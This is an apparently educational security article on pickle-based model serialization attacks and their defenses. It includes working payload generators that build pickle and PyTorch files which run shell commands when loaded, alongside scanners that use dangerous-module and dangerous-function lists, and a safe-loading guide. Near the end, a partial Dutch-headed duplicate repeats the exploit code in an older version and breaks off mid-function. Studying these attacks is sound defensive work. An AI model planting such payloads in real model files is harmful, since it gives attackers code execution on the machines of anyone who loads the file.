Model Serialization Attacks

Intermediate · 12 min read · Updated 2026-03-20

Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.

infrastructure serialization pickle supply-chain code-execution

Overview

Model serialization, the process of saving trained model weights and architecture to disk, is one of the most dangerous attack surfaces in the ML ecosystem. The dominant serialization format for PyTorch models relies on Python's pickle module, which is fundamentally unsafe: loading a pickle file can execute arbitrary Python code. Downloading and loading a model from an untrusted source is therefore equivalent to downloading and running an executable from that source.

This vulnerability is not theoretical. Researchers have repeatedly demonstrated malicious model files on the Hugging Face Hub and other model repositories. The attack surface is broad because loading models is so routine: data scientists and ML engineers regularly download pretrained models and fine-tuned checkpoints, often with minimal verification. The widespread culture of sharing models through platforms such as Hugging Face has normalized a practice that traditional software engineering would consider reckless.

This article covers the mechanics of serialization attacks across formats (pickle, PyTorch checkpoints, ONNX), demonstrates how malicious model files are created and detected, and presents safe loading practices. The attacks map to MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and are covered by OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).

Python Pickle: The Fundamental Vulnerability

How Pickle Works

Python's pickle module serializes Python objects by recording the instructions needed to reconstruct them. During unpickling, a virtual machine executes those instructions. The critical security problem is that pickle's instruction set includes the REDUCE opcode, which calls an arbitrary callable with arbitrary arguments. This is by design, because pickle has to reconstruct complex objects, but it means a crafted pickle file can call os.system, subprocess.Popen, or any other Python function.

import pickle
 
class PickleExploit:
    """
    Demonstrate how pickle deserialization enables code execution.
    FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
    """
 
    @staticmethod
    def create_malicious_pickle(command: str) -> bytes:
        """
        Create a pickle payload that executes a shell command on load.
        This demonstrates why pickle is fundamentally unsafe for untrusted data.
        """
        # The __reduce__ method tells pickle how to reconstruct the object.
        # By returning (os.system, (command,)), we instruct the unpickler
        # to call os.system(command) when loading.
 
        import os
 
        class Exploit:
            def __reduce__(self):
                return (os.system, (command,))
 
        return pickle.dumps(Exploit())
 
    @staticmethod
    def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
        """
        Create a payload that executes code AND returns legitimate-looking data.
        This is harder to detect because the model appears to load correctly.
        """
        # This payload first executes the command, then returns normal data
        class StealthExploit:
            def __init__(self, data):
                self.data = data
 
            def __reduce__(self):
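                # eval() runs the command and then evaluates to the legitimate data:
                # os.system() returns an int, so "<status> and None" is always falsy
                # and the "or" branch yields the data. The !r conversions keep quotes
                # in the command or data from breaking the generated expression.
                return (
                    eval,
                    (
                        f"__import__('os').system({command!r}) and None or {self.data!r}",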
                    ),
                )
 
        return pickle.dumps(StealthExploit(legitimate_data))
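The mechanism can be observed without running anything harmful. The following minimal sketch swaps the shell command for the harmless built-in int; the class name Benign is purely illustrative and is not part of the example above. It disassembles the payload with pickletools before loading it, so the call instruction is visible in the opcode stream.

```python
import pickle
import pickletools


class Benign:
    """Stands in for a payload: __reduce__ names a callable and its arguments."""

    def __reduce__(self):
        # On load, the unpickler calls int("42") instead of rebuilding Benign.
        return (int, ("42",))


payload = pickle.dumps(Benign())

# Disassemble without executing: collect the opcode names in the stream.
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(payload)]

# Loading executes the REDUCE opcode, which performs the call.
loaded = pickle.loads(payload)

print(opcode_names)
print(type(loaded).__name__, loaded)
```

The disassembly contains an opcode that names the callable (STACK_GLOBAL or GLOBAL, depending on the protocol) followed by REDUCE, and the loaded object is the integer 42 rather than a Benign instance. Replacing int with os.system is the only change an attacker needs.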

PyTorch Model Files

PyTorch's torch.save() uses pickle by default. A malicious PyTorch model file (.pt, .pth, or .bin) can execute arbitrary code when it is loaded with torch.load() without weights_only=True:

import torch
import torch.nn as nn
from typing import Dict, Any
import os
 
class MaliciousModelDemo:
    """
    Demonstrate malicious PyTorch model file creation.
    FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
    """
 
    @staticmethod
    def create_backdoored_model(
        legitimate_model: nn.Module,
        payload_command: str,
        output_path: str,
    ) -> None:
        """
        Save a model that executes a payload when loaded.
        The model functions normally after loading — the payload is stealthy.
        """
 
        class TrojanizedState(dict):
            """A dict subclass that executes code when unpickled."""
 
            def __init__(self, state_dict: dict, command: str):
                super().__init__(state_dict)
                self._command = command
 
            def __reduce__(self):
                # When unpickled:
                # 1. Execute the payload
                # 2. Return a normal dict (so the model loads correctly)
                return (
                    _reconstruct_with_payload,
                    (dict(self), self._command),
                )
 
        state = TrojanizedState(legitimate_model.state_dict(), payload_command)
        torch.save(state, output_path)
 
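def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper function used during deserialization.

    Pickle stores only a reference to this function (module and name), so
    this demo fires only where the same module is importable at load time.
    A payload that references a standard-library callable has no such limit.
    """
    os.system(command)
    return state_dict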
 
class SafeModelLoader:
    """Load PyTorch models with safety checks."""
 
    @staticmethod
    def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
        """
        Load a model using weights_only=True (available since PyTorch 1.13,
        the default since PyTorch 2.6).
        This restricts unpickling to tensors, primitive types, and an
        allowlist of known-safe classes.
        """
        try:
            state_dict = torch.load(
                path,
                map_location=map_location,
                weights_only=True,  # Critical security flag
            )
            return {"success": True, "state_dict": state_dict}
        except Exception as e:
            return {
                "success": False,
                "error": str(e),
                "detail": "Model file may contain non-tensor data (potential exploit)",
            }
 
    @staticmethod
    def scan_pickle_for_dangerous_ops(file_path: str) -> list:
        """
        Scan a pickle file for potentially dangerous operations
        WITHOUT executing them. Zip-based PyTorch checkpoints are handled
        by scanning every embedded .pkl member. This is a heuristic: an
        empty result does not prove the file is safe.
        """
        import pickletools
        import zipfile
        findings = []

        # "posix" and "nt" are the modules that os.system actually pickles as.
        dangerous_modules = {
            "os", "posix", "nt", "subprocess", "sys", "shutil", "builtins",
            "importlib", "ctypes", "socket", "http", "urllib",
            "requests", "pathlib", "tempfile", "webbrowser",
        }

        dangerous_functions = {
            "system", "popen", "exec", "eval", "execfile",
            "compile", "__import__", "getattr", "setattr",
            "globals", "locals", "open", "input",
        }

        try:
            if zipfile.is_zipfile(file_path):
                # torch.save() has written zip archives since PyTorch 1.6
                with zipfile.ZipFile(file_path) as zf:
                    streams = [zf.read(n) for n in zf.namelist() if n.endswith(".pkl")]
            else:
                with open(file_path, "rb") as f:
                    streams = [f.read()]

            for data in streams:
                recent_strings = []  # string operands seen so far in this stream
                # Use pickletools to disassemble without executing
                for opcode, arg, pos in pickletools.genops(data):
                    if opcode.name in ("GLOBAL", "INST"):
                        # pickletools reports the operand as "module name"
                        module, _, func = arg.partition(" ")
                    elif opcode.name == "STACK_GLOBAL":
                        # Operands come from the stack; approximate them with
                        # the two most recent string arguments.
                        module, func = (["", ""] + recent_strings)[-2:]
                    else:
                        if isinstance(arg, str):
                            recent_strings.append(arg)
                        if opcode.name == "REDUCE":
                            findings.append({
                                "severity": "medium",
                                "position": pos,
                                "opcode": "REDUCE",
                                "finding": "REDUCE opcode found: triggers function call during unpickling",
                            })
                        continue

                    reference = f"{module}.{func}"
                    top_level = module.split(".")[0]
                    if top_level in dangerous_modules or func.split(".")[-1] in dangerous_functions:
                        findings.append({
                            "severity": "critical",
                            "position": pos,
                            "opcode": opcode.name,
                            "reference": reference,
                            "finding": f"Dangerous reference: {reference}",
                        })

        except Exception as e:
            findings.append({
                "severity": "error",
                "finding": f"Failed to analyze pickle file: {e}",
            })

        return findings
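Static scanning is a denylist and can be evaded, so it is worth pairing with an allowlist at load time. The sketch below follows the "restricting globals" pattern from the Python pickle documentation: it overrides Unpickler.find_class so that only explicitly approved globals can be resolved. The names ALLOWED_GLOBALS, AllowlistUnpickler, restricted_loads, and CallsGetcwd are illustrative, and the allowlist contents are an assumption that would need to be adapted to the objects a given checkpoint legitimately contains.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not named in ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


# A plain container of primitives loads normally.
safe_blob = pickle.dumps(OrderedDict(weight=[1.0, 2.0]))
safe_result = restricted_loads(safe_blob)


class CallsGetcwd:
    """Benign stand-in for an exploit: asks the unpickler to call os.getcwd()."""

    def __reduce__(self):
        return (os.getcwd, ())


blocked = False
try:
    restricted_loads(pickle.dumps(CallsGetcwd()))
except pickle.UnpicklingError as exc:
    blocked = True
    print("blocked:", exc)
```

The rejected call never runs, because the lookup fails before REDUCE is reached. The weights_only=True option of torch.load() is similar in spirit, although its allowlist and implementation are PyTorch's own.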

SafeTensors: The Safe Alternative

SafeTensors is a serialization format developed by Hugging Face specifically to address pickle's security problems. It stores only tensor data (shapes, dtypes, and raw numeric data) and has no mechanism for embedding executable code.

SafeTensors Architecture

The format is simple:

An 8-byte header size (little-endian uint64)
A JSON header describing tensor names, shapes, dtypes, and byte offsets
Raw tensor data in contiguous byte arrays

There is no code, no object reconstruction, and no invocation of callables: only data.
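Because the layout is this small, the header can be inspected with the standard library alone, without importing safetensors or torch. The following sketch reads the 8-byte length prefix and the JSON header and never touches the tensor bytes. The function names and the max_header_bytes cap are illustrative assumptions, and write_tiny_example builds a hand-made two-element file only so the example is self-contained.

```python
import json
import struct
import tempfile
from pathlib import Path


def read_safetensors_header(path, max_header_bytes=100_000_000):
    """Parse only the JSON header of a SafeTensors file."""
    with open(path, "rb") as f:
        prefix = f.read(8)
        if len(prefix) != 8:
            raise ValueError("file too short for a SafeTensors header")
        # Little-endian unsigned 64-bit integer: the size of the JSON header.
        (header_len,) = struct.unpack("<Q", prefix)
        if header_len > max_header_bytes:  # assumed sanity cap
            raise ValueError(f"implausible header size: {header_len}")
        raw = f.read(header_len)
        if len(raw) != header_len:
            raise ValueError("truncated header")
    return json.loads(raw.decode("utf-8"))


def write_tiny_example(path):
    """Write a minimal file holding one float32 tensor named 'w'."""
    data = struct.pack("<2f", 1.0, 2.0)
    header = {"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, len(data)]}}
    header_bytes = json.dumps(header).encode("utf-8")
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(header_bytes)))
        f.write(header_bytes)
        f.write(data)


with tempfile.TemporaryDirectory() as tmp:
    example = Path(tmp) / "tiny.safetensors"
    write_tiny_example(example)
    header = read_safetensors_header(example)

print(header)
```

Everything a loader needs is plain JSON plus byte offsets, which is why parsing the file cannot trigger a function call the way unpickling can.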

from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
 
class SafeTensorsManager:
    """Manage model weights using the SafeTensors format."""
 
    @staticmethod
    def convert_pytorch_to_safetensors(
        pytorch_path: str,
        safetensors_path: str,
    ) -> Dict:
        """Convert a PyTorch model file to SafeTensors format."""
        # Load with weights_only=True for safety during conversion
        state_dict = torch.load(
            pytorch_path, map_location="cpu", weights_only=True
        )
 
        # Ensure all values are tensors
        tensor_dict = {}
        for key, value in state_dict.items():
            if isinstance(value, torch.Tensor):
                tensor_dict[key] = value
            else:
                print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
 
        save_file(tensor_dict, safetensors_path)
 
        return {
            "input": pytorch_path,
            "output": safetensors_path,
            "tensors_saved": len(tensor_dict),
            "tensors_skipped": len(state_dict) - len(tensor_dict),
        }
 
    @staticmethod
    def verify_safetensors_integrity(file_path: str) -> Dict:
        """Verify a SafeTensors file's integrity and inspect its contents."""
        path = Path(file_path)
        result = {
            "file": file_path,
            "size_bytes": path.stat().st_size,
            "format_valid": False,
            "tensors": [],
        }
 
        try:
            with safe_open(file_path, framework="pt", device="cpu") as f:
                keys = f.keys()
                for key in keys:
                    tensor = f.get_tensor(key)
                    result["tensors"].append({
                        "name": key,
                        "shape": list(tensor.shape),
                        "dtype": str(tensor.dtype),
                    })
                result["format_valid"] = True
                result["tensor_count"] = len(keys)
        except Exception as e:
            result["error"] = str(e)
 
        return result

Limitations of SafeTensors

SafeTensors is not a complete model format: it stores only tensors, not the model architecture, optimizer state, or training configuration. This means:

The model architecture must be defined in code, and the SafeTensors file supplies only the weights
Custom objects (learning-rate schedules, custom layers) cannot be serialized
Some Hugging Face models still ship pickle files alongside SafeTensors for backward compatibility

ONNX Security Considerations

ONNX (Open Neural Network Exchange) is an open format for ML models that uses Protocol Buffers serialization. It is safer than pickle because loading parses data against a defined schema instead of executing arbitrary code. ONNX nevertheless has security concerns of its own:

Custom Operators

ONNX supports custom operators, which can load and execute shared libraries:

from typing import Dict, List
from pathlib import Path
 
class ONNXSecurityScanner:
    """Scan ONNX models for security issues."""
 
    def scan_model(self, model_path: str) -> List[Dict]:
        """Scan an ONNX model for security concerns."""
        import onnx
 
        findings = []
        model = onnx.load(model_path)
 
        # Check for custom operators (could load arbitrary shared libraries)
        for node in model.graph.node:
            if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
                findings.append({
                    "severity": "high",
                    "finding": f"Custom operator domain: {node.domain}",
                    "operator": node.op_type,
                    "detail": "Custom operators may load arbitrary native code",
                })
 
        # Check for external data references
        for initializer in model.graph.initializer:
            if initializer.data_location == onnx.TensorProto.EXTERNAL:  # enum value 1
                external_path = ""
                for entry in initializer.external_data:
                    if entry.key == "location":
                        external_path = entry.value
                findings.append({
                    "severity": "medium",
                    "finding": f"External data reference: {external_path}",
                    "detail": "External data could point to a malicious file path",
                })
 
        # Check model metadata for suspicious content
        for prop in model.metadata_props:
            if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
                findings.append({
                    "severity": "medium",
                    "finding": f"Suspicious metadata: {prop.key}",
                    "value_preview": prop.value[:100],
                })
 
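        # Check file size vs parameter count (anomalously large files may contain embedded data).
        # Count tensor elements, not initializers, so the ratio really is bytes per parameter.
        file_size = Path(model_path).stat().st_size
        param_count = 0
        for initializer in model.graph.initializer:
            element_count = 1
            for dim in initializer.dims:
                element_count *= dim
            param_count += element_count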
        if param_count > 0:
            bytes_per_param = file_size / param_count
            if bytes_per_param > 1000:  # Unusually large
                findings.append({
                    "severity": "low",
                    "finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
                    "detail": "Model file may contain embedded non-model data",
                })
 
        return findings
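The scanner above reports every external data reference but does not judge where it points. One way to tighten that check, sketched here under the assumption that external tensor files are expected to live inside the model's own directory, is to resolve the location and reject anything that escapes it. The helper name is_contained_location and the example paths are hypothetical.

```python
from pathlib import Path


def is_contained_location(model_path: str, location: str) -> bool:
    """Return True only if `location` stays inside the model's directory."""
    model_dir = Path(model_path).resolve().parent
    candidate = Path(location)
    if candidate.is_absolute():
        return False
    # resolve() collapses ".." segments and follows symlinks that exist.
    resolved = (model_dir / candidate).resolve()
    return model_dir in resolved.parents


model_file = "/models/resnet/model.onnx"  # hypothetical path
checks = {
    "weights.bin": is_contained_location(model_file, "weights.bin"),
    "shards/part0.bin": is_contained_location(model_file, "shards/part0.bin"),
    "../../etc/passwd": is_contained_location(model_file, "../../etc/passwd"),
    "/etc/passwd": is_contained_location(model_file, "/etc/passwd"),
}

for location, allowed in checks.items():
    print(f"{location}: {'ok' if allowed else 'rejected'}")
```

A reference that fails this check could be raised from "medium" to "high" severity in the scanner's findings.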

Model File Scanning Pipeline

Automated Scanning in CI/CD

Integrate model file scanning into the CI/CD stage of your ML pipeline:

import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
 
class ModelFileScanner:
    """Comprehensive model file security scanner for CI/CD pipelines."""
 
    SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
    UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
 
    def __init__(self, policy: str = "strict"):
        """
        Args:
            policy: 'strict' blocks all unsafe formats,
                    'warn' logs warnings but allows loading
        """
        self.policy = policy
 
    def scan_directory(self, directory: str) -> Dict:
        """Scan a directory of model files for security issues."""
        path = Path(directory)
        results = {
            "scan_time": datetime.now(timezone.utc).isoformat(),
            "directory": directory,
            "policy": self.policy,
            "files_scanned": 0,
            "findings": [],
            "blocked": [],
            "safe_files": [],
        }
 
        for file_path in path.rglob("*"):
            if not file_path.is_file():
                continue
 
            results["files_scanned"] += 1
            suffix = file_path.suffix.lower()
 
            if suffix in self.UNSAFE_FORMATS:
                finding = {
                    "file": str(file_path),
                    "format": suffix,
                    "severity": "high",
                    "finding": f"Unsafe serialization format: {suffix}",
                }
 
                # Deep scan pickle-based files
                if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
                    try:
                        pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
                            str(file_path)
                        )
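                        if pickle_findings:
                            finding["pickle_analysis"] = pickle_findings
                            # Escalate only on dangerous references; plain REDUCE
                            # opcodes also occur in legitimate checkpoints.
                            if any(f["severity"] == "critical" for f in pickle_findings):
                                finding["severity"] = "critical"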
                    except Exception as e:
                        finding["scan_error"] = str(e)
 
                results["findings"].append(finding)
                if self.policy == "strict":
                    results["blocked"].append(str(file_path))
 
            elif suffix in self.SAFE_FORMATS:
                results["safe_files"].append(str(file_path))
 
        results["pass"] = len(results["blocked"]) == 0
        return results
 
    def generate_manifest(self, directory: str) -> Dict[str, str]:
        """Generate a hash manifest for all model files in a directory."""
        path = Path(directory)
        manifest = {}
 
        for file_path in sorted(path.rglob("*")):
            if file_path.is_file():
                sha256 = hashlib.sha256()
                with open(file_path, "rb") as f:
                    for chunk in iter(lambda: f.read(8192), b""):
                        sha256.update(chunk)
                relative = str(file_path.relative_to(path))
                manifest[relative] = sha256.hexdigest()
 
        return manifest
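A manifest is only useful if something checks files against it before they are loaded. The following sketch shows one possible verification step; verify_manifest and sha256_file are illustrative helpers rather than part of the scanner class above, and the manifest is assumed to use the same relative-path keys that generate_manifest produces.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large checkpoints do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(directory: str, manifest: Dict[str, str]) -> List[str]:
    """Return a list of problems; an empty list means the directory matches."""
    root = Path(directory)
    problems = []
    for relative, expected in manifest.items():
        target = root / relative
        if not target.is_file():
            problems.append(f"missing: {relative}")
        elif sha256_file(target) != expected:
            problems.append(f"hash mismatch: {relative}")
    # Files that are present but absent from the manifest are also suspicious.
    on_disk = {str(p.relative_to(root)) for p in root.rglob("*") if p.is_file()}
    for extra in sorted(on_disk - set(manifest)):
        problems.append(f"unexpected file: {extra}")
    return problems


with tempfile.TemporaryDirectory() as tmp:
    weights = Path(tmp) / "model.safetensors"
    weights.write_bytes(b"original weights")
    trusted = {"model.safetensors": sha256_file(weights)}
    clean_report = verify_manifest(tmp, trusted)

    # Simulate tampering and a dropped-in extra file.
    weights.write_bytes(b"tampered weights")
    (Path(tmp) / "extra.pkl").write_bytes(b"unexpected")
    tampered_report = verify_manifest(tmp, trusted)

print(clean_report)
print(tampered_report)
```

The manifest itself has to come from a trusted channel, for example a signed release artifact, since an attacker who can replace both the model and the manifest defeats the check.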

Scanning with Existing Tools

Several tools can scan model files for malicious content:

#!/bin/bash
# Model file security scanning pipeline
 
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
    echo "Usage: $0 <model_directory>"
    exit 1
fi
 
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
 
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while IFS= read -r f; do
    echo "  CRITICAL: Pickle file found: $f"
done
 
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while IFS= read -r f; do
    echo "  WARNING: PyTorch file (may use pickle): $f"
done
 
find "$MODEL_DIR" -type f -name "*.safetensors" | while IFS= read -r f; do
    echo "  OK: SafeTensors file: $f"
done
 
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
    find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while IFS= read -r f; do
        echo "  Analyzing: $f"
        fickling --check-safety "$f" 2>/dev/null || echo "    Could not analyze $f"
    done
else
    echo "  fickling not installed. Install with: pip install fickling"
fi
 
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
    modelscan scan -p "$MODEL_DIR"
else
    echo "  modelscan not installed. Install with: pip install modelscan"
fi
 
echo ""
echo "=== Scan Complete ==="

Both tools used above are real, publicly available projects:

fickling (Trail of Bits): Static analysis of pickle files without executing them. https://github.com/trailofbits/fickling
modelscan (Protect AI): Scans model files for unsafe operations across multiple formats. https://github.com/protectai/modelscan
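Both the Python scanner and the shell script classify files by extension, which an attacker controls. A content-based check is a useful complement. The sketch below is a rough heuristic, not a full format validator: it recognizes zip archives (the container torch.save() has used since PyTorch 1.6), pickle streams that start with a PROTO opcode (protocol 2 and later), and files whose ninth byte opens a JSON object as SafeTensors headers do. The function name sniff_model_format and the returned labels are illustrative.

```python
import pickle
import struct
import tempfile
import zipfile
from pathlib import Path


def sniff_model_format(path: str) -> str:
    """Guess a model file's real format from its leading bytes."""
    with open(path, "rb") as f:
        head = f.read(16)
    if zipfile.is_zipfile(path):
        return "zip-archive"  # may contain pickle members
    # PROTO opcode (0x80) followed by the protocol number. Protocols 0 and 1
    # have no such marker, so they fall through to "unknown".
    if len(head) >= 2 and head[0] == 0x80 and 2 <= head[1] <= 5:
        return "pickle"
    # SafeTensors: 8-byte length prefix, then a JSON object.
    if len(head) >= 9 and head[8:9] == b"{":
        return "safetensors-like"
    return "unknown"


with tempfile.TemporaryDirectory() as tmp:
    # A pickle renamed to look like a SafeTensors file.
    disguised = Path(tmp) / "model.safetensors"
    disguised.write_bytes(pickle.dumps({"a": 1}))
    disguised_kind = sniff_model_format(str(disguised))

    # A zip container similar in shape to a modern PyTorch checkpoint.
    archive = Path(tmp) / "model.pt"
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("archive/data.pkl", pickle.dumps({"a": 1}))
    archive_kind = sniff_model_format(str(archive))

    # A minimal file with a SafeTensors-shaped prefix and empty header.
    genuine = Path(tmp) / "weights.safetensors"
    genuine.write_bytes(struct.pack("<Q", 2) + b"{}")
    genuine_kind = sniff_model_format(str(genuine))

print(disguised_kind, archive_kind, genuine_kind)
```

A mismatch between the sniffed format and the extension, such as the disguised file here, is a strong signal that the file deserves a deep scan or outright rejection.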

Format Comparison

Format	Code execution risk	Ecosystem support	Performance	Recommended
Pickle (.pkl)	Critical: arbitrary code execution	Universal in Python	Fast	Never for untrusted sources
PyTorch (.pt/.pth)	High: uses pickle internally	PyTorch ecosystem	Fast	Use weights_only=True
SafeTensors	None: data only	Hugging Face, growing	Fast	Yes, preferred format
ONNX (.onnx)	Low: custom ops can load code	Cross-framework	Good	Yes, with review of custom ops
TensorRT (.plan)	Low: engine format	NVIDIA inference	Fastest	Yes, for NVIDIA deployment
TFLite (.tflite)	Low: FlatBuffers format	Mobile/edge	Good	Yes, for edge deployment

Defensive Recommendations

Use SafeTensors as the default serialization format for all new models
Always pass weights_only=True when loading PyTorch models with torch.load()
Scan all model files in CI/CD pipelines before deployment with fickling or modelscan
Never load pickle files from untrusted sources; treat them as executables
Convert existing pickle models to SafeTensors format and retire the pickle versions
Verify model file hashes against a trusted manifest before loading
Restrict model download sources to approved registries with verified publishers
Monitor Hugging Face models for changes after upload (pin commit hashes, not branch refs)
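The last recommendation can be enforced in code rather than left to convention. The sketch below refuses to download unless the revision is a full 40-character commit hash. is_pinned_revision and download_pinned are hypothetical helper names; hf_hub_download and its repo_id, filename, and revision parameters come from the huggingface_hub library, which is imported lazily so the validation logic runs without it installed.

```python
import re

# A full Git commit hash: 40 lowercase hexadecimal characters.
_COMMIT_SHA = re.compile(r"[0-9a-f]{40}")


def is_pinned_revision(revision: str) -> bool:
    """True for a full commit hash, False for branches, tags, or short hashes."""
    return bool(_COMMIT_SHA.fullmatch(revision))


def download_pinned(repo_id: str, filename: str, revision: str) -> str:
    """Download one file from the Hub, but only at an immutable revision."""
    if not is_pinned_revision(revision):
        raise ValueError(
            f"revision {revision!r} is not a full commit hash; "
            "branch names such as 'main' can change after review"
        )
    # Third-party dependency, imported only when a download is attempted.
    from huggingface_hub import hf_hub_download

    return hf_hub_download(repo_id=repo_id, filename=filename, revision=revision)


print(is_pinned_revision("main"))
print(is_pinned_revision("0123456789abcdef0123456789abcdef01234567"))
```

Pinning fixes which bytes are fetched, but it does not make those bytes safe; the pinned revision still has to pass the scanning and hash checks described above.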

References

Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
Hugging Face SafeTensors — https://github.com/huggingface/safetensors
MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
PyTorch weights_only documentation — https://pytorch.org/docs/stable/generated/torch.load.html

Model Serialization Attacks

Gemiddeld12 min lezenBijgewerkt op 2026-03-20

Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.

infrastructure serialization pickle supply-chain code-execution

Overzicht

Python Pickle: de fundamentele kwetsbaarheid

Hoe pickle werkt

import pickle
import io
import struct
 
class PickleExploit:
    """
    Demonstrate how pickle deserialization enables code execution.
    FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
    """
 
    @staticmethod
    def create_malicious_pickle(command: str) -> bytes:
        """
        Create a pickle payload that executes a shell command on load.
        This demonstrates why pickle is fundamentally unsafe for untrusted data.
        """
        # The __reduce__ method tells pickle how to reconstruct the object.
        # By returning (os.system, (command,)), we instruct the unpickler
        # to call os.system(command) when loading.
 
        import os
 
        class Exploit:
            def __reduce__(self):
                return (os.system, (command,))
 
        return pickle.dumps(Exploit())
 
    @staticmethod
    def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
        """
        Create a payload that executes code AND returns legitimate-looking data.
        This is harder to detect because the model appears to load correctly.
        """
        # This payload first executes the command, then returns normal data
        class StealthExploit:
            def __init__(self, data):
                self.data = data
 
            def __reduce__(self):
                # Use exec() to run code, then return the legitimate data
                return (
                    eval,
                    (
                        f"__import__('os').system('{command}') and None or {repr(self.data)}",
                    ),
                )
 
        return pickle.dumps(StealthExploit(legitimate_data))

PyTorch-modelbestanden

torch.save() van PyTorch gebruikt standaard pickle. Een kwaadaardig PyTorch-modelbestand (.pt, .pth of .bin) kan willekeurige code uitvoeren wanneer het wordt geladen met torch.load():

import torch
import torch.nn as nn
from typing import Dict, Any
import os
 
class MaliciousModelDemo:
    """
    Demonstrate malicious PyTorch model file creation.
    FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
    """
 
    @staticmethod
    def create_backdoored_model(
        legitimate_model: nn.Module,
        payload_command: str,
        output_path: str,
    ) -> None:
        """
        Save a model that executes a payload when loaded.
        The model functions normally after loading — the payload is stealthy.
        """
 
        class TrojanizedState(dict):
            """A dict subclass that executes code when unpickled."""
 
            def __init__(self, state_dict: dict, command: str):
                super().__init__(state_dict)
                self._command = command
 
            def __reduce__(self):
                # When unpickled:
                # 1. Execute the payload
                # 2. Return a normal dict (so the model loads correctly)
                return (
                    _reconstruct_with_payload,
                    (dict(self), self._command),
                )
 
        state = TrojanizedState(legitimate_model.state_dict(), payload_command)
        torch.save(state, output_path)
 
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper function used during deserialization."""
    os.system(command)
    return state_dict
 
class SafeModelLoader:
    """Load PyTorch models with safety checks."""
 
    @staticmethod
    def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
        """
        Load a model using weights_only=True (PyTorch 2.0+).
        This restricts unpickling to tensor data only.
        """
        try:
            state_dict = torch.load(
                path,
                map_location=map_location,
                weights_only=True,  # Critical security flag
            )
            return {"success": True, "state_dict": state_dict}
        except Exception as e:
            return {
                "success": False,
                "error": str(e),
                "detail": "Model file may contain non-tensor data (potential exploit)",
            }
 
    @staticmethod
    def scan_pickle_for_dangerous_ops(file_path: str) -> list:
        """
        Scan a pickle file for potentially dangerous operations
        WITHOUT executing them.
        """
        import pickletools
        findings = []
 
        dangerous_modules = {
            "os", "subprocess", "sys", "shutil", "builtins",
            "importlib", "ctypes", "socket", "http", "urllib",
            "requests", "pathlib", "tempfile", "webbrowser",
        }
 
        dangerous_functions = {
            "system", "popen", "exec", "eval", "execfile",
            "compile", "__import__", "getattr", "setattr",
            "globals", "locals", "open", "input",
        }
 
        try:
            with open(file_path, "rb") as f:
                data = f.read()
 
            # Use pickletools to disassemble without executing
            ops = []
            for opcode, arg, pos in pickletools.genops(data):
                ops.append((opcode.name, arg, pos))
 
                if opcode.name in ("GLOBAL", "INST", "STACK_GLOBAL"):
                    if arg and isinstance(arg, str):
                        module = arg.split(".")[0] if "." in arg else arg.split("\n")[0]
                        func = arg.split(".")[-1] if "." in arg else arg.split("\n")[-1] if "\n" in arg else ""
 
                        if module in dangerous_modules or func in dangerous_functions:
                            findings.append({
                                "severity": "critical",
                                "position": pos,
                                "opcode": opcode.name,
                                "reference": arg,
